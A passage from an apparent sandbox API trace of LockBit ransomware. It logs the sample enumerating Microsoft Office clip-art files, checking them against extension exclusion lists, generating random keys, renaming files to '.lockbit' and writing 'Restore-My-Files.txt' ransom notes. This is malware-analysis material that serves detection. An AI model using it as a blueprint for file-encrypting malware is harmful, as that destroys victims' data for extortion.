Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00623_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0117.924] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.924] malloc (_Size=0x40068) returned 0x3d70450 [0117.924] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=10644) returned 1 [0117.924] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.925] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0117.925] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.925] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0117.925] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0117.928] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.928] malloc (_Size=0xa6) returned 0x77d7a8 [0117.928] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0117.929] free (_Block=0x77d7a8) [0117.929] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.929] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.929] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.929] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b873a00, ftCreationTime.dwHighDateTime=0x1bd4b18, ftLastAccessTime.dwLowDateTime=0x538951f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7b873a00, ftLastWriteTime.dwHighDateTime=0x1bd4b18, nFileSizeHigh=0x0, nFileSizeLow=0x844, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH00625_.WMF", cAlternateFileName="")) returned 1 [0117.929] lstrcmpiW (lpString1=".", lpString2="HH00625_.WMF") returned -1 [0117.929] lstrcmpiW (lpString1="..", lpString2="HH00625_.WMF") returned -1 [0117.929] PathFindExtensionW (pszPath="HH00625_.WMF") returned=".WMF" [0117.929] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0117.929] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0117.929] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0117.929] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0117.929] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0117.929] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0117.930] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0117.930] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0117.930] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0117.930] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0117.930] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0117.930] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0117.930] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0117.930] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0117.930] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0117.930] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0117.930] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0117.930] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0117.930] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0117.930] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0117.930] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0117.930] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0117.930] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0117.930] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0117.931] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.931] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0117.931] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0117.931] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0117.931] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0117.931] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0117.931] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0117.931] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0117.931] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0117.931] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0117.931] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0117.931] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0117.931] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0117.931] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0117.931] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0117.931] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0117.931] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0117.931] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0117.932] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.932] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0117.932] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0117.932] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0117.932] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0117.932] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH00625_.WMF") returned 1 [0117.932] lstrcmpiW (lpString1="ntldr", lpString2="HH00625_.WMF") returned 1 [0117.932] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH00625_.WMF") returned 1 [0117.932] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH00625_.WMF") returned -1 [0117.932] lstrcmpiW (lpString1="autorun.inf", lpString2="HH00625_.WMF") returned -1 [0117.932] lstrcmpiW (lpString1="thumbs.db", lpString2="HH00625_.WMF") returned 1 [0117.932] lstrcmpiW (lpString1="iconcache.db", lpString2="HH00625_.WMF") returned 1 [0117.932] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0117.932] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF") returned=".WMF" [0117.932] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0117.932] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0117.932] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0117.932] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0117.933] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0117.933] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0117.933] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0117.933] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0117.933] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0117.933] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0117.933] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0117.933] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0117.933] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0117.933] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0117.933] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0117.933] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0117.933] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0117.933] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0117.933] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0117.933] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0117.933] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0117.933] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0117.933] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0117.934] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0117.934] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0117.934] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0117.934] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0117.934] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0117.934] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF.lockbit") returned 72 [0117.934] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00625_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0117.935] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.935] malloc (_Size=0x40068) returned 0x3db04c0 [0117.936] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3db04d8 | out: lpFileSize=0x3db04d8*=2116) returned 1 [0117.936] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.937] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df04f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df04f4) returned 0x0 [0117.937] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.937] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df0504, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df0504) returned 0x0 [0117.937] ReadFile (in: hFile=0x81c, lpBuffer=0x3db04f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0) returned 1 [0117.960] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.960] malloc (_Size=0xa6) returned 0x77d7a8 [0117.960] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0117.961] free (_Block=0x77d7a8) [0117.961] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.962] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.962] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.962] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5d7f800, ftCreationTime.dwHighDateTime=0x1bd4b16, ftLastAccessTime.dwLowDateTime=0x538951f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa5d7f800, ftLastWriteTime.dwHighDateTime=0x1bd4b16, nFileSizeHigh=0x0, nFileSizeLow=0x620, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH00636_.WMF", cAlternateFileName="")) returned 1 [0117.962] lstrcmpiW (lpString1=".", lpString2="HH00636_.WMF") returned -1 [0117.962] lstrcmpiW (lpString1="..", lpString2="HH00636_.WMF") returned -1 [0117.962] PathFindExtensionW (pszPath="HH00636_.WMF") returned=".WMF" [0117.962] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0117.962] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0117.962] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0117.962] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0117.962] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0117.962] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0117.962] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0117.962] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0117.963] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0117.963] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0117.963] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0117.963] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0117.963] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0117.963] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0117.963] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0117.963] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0117.963] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0117.963] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0117.963] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0117.963] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0117.963] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0117.963] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0117.963] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0117.963] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0117.963] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.963] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0117.964] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0117.964] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0117.964] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0117.964] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0117.964] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0117.964] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0117.964] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0117.964] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0117.964] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0117.964] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0117.964] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0117.964] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0117.964] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0117.964] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0117.964] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0117.964] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0117.964] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.964] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0117.964] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0117.965] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0117.965] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0117.965] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH00636_.WMF") returned 1 [0117.965] lstrcmpiW (lpString1="ntldr", lpString2="HH00636_.WMF") returned 1 [0117.965] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH00636_.WMF") returned 1 [0117.965] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH00636_.WMF") returned -1 [0117.965] lstrcmpiW (lpString1="autorun.inf", lpString2="HH00636_.WMF") returned -1 [0117.965] lstrcmpiW (lpString1="thumbs.db", lpString2="HH00636_.WMF") returned 1 [0117.965] lstrcmpiW (lpString1="iconcache.db", lpString2="HH00636_.WMF") returned 1 [0117.965] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0117.965] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF") returned=".WMF" [0117.965] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0117.965] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0117.965] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0117.965] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0117.965] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0117.965] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0117.965] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0117.966] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0117.966] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0117.966] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0117.966] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0117.966] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0117.966] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0117.966] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0117.966] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0117.966] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0117.966] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0117.966] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0117.966] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0117.966] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0117.966] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0117.966] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0117.966] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0117.966] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0117.966] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0117.967] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0117.967] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0117.967] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0117.967] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF.lockbit") returned 72 [0117.967] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00636_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0117.978] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.978] malloc (_Size=0x40068) returned 0x3e70008 [0117.978] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=1568) returned 1 [0117.978] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.978] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.978] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0117.978] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.979] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0117.979] ReadFile (in: hFile=0x2f4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0117.986] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.986] malloc (_Size=0xa6) returned 0x77d7a8 [0117.986] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0117.987] free (_Block=0x77d7a8) [0117.987] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.987] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.987] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.987] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9db29500, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x61ca6dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9db29500, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x2ce2, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH00669_.WMF", cAlternateFileName="")) returned 1 [0117.987] lstrcmpiW (lpString1=".", lpString2="HH00669_.WMF") returned -1 [0117.987] lstrcmpiW (lpString1="..", lpString2="HH00669_.WMF") returned -1 [0117.987] PathFindExtensionW (pszPath="HH00669_.WMF") returned=".WMF" [0117.987] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0117.987] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0117.988] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0117.988] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0117.988] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0117.988] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0117.988] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0117.988] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0117.988] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0117.988] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0117.988] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0117.988] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0117.988] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0117.988] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0117.988] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0117.988] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0117.988] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0117.988] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0117.988] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0117.988] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0117.988] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0117.988] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0117.988] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0117.988] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0117.989] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.989] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0117.989] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0117.989] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0117.989] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0117.989] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0117.989] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0117.989] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0117.989] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0117.989] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0117.989] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0117.989] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0117.989] lstrcmpiW 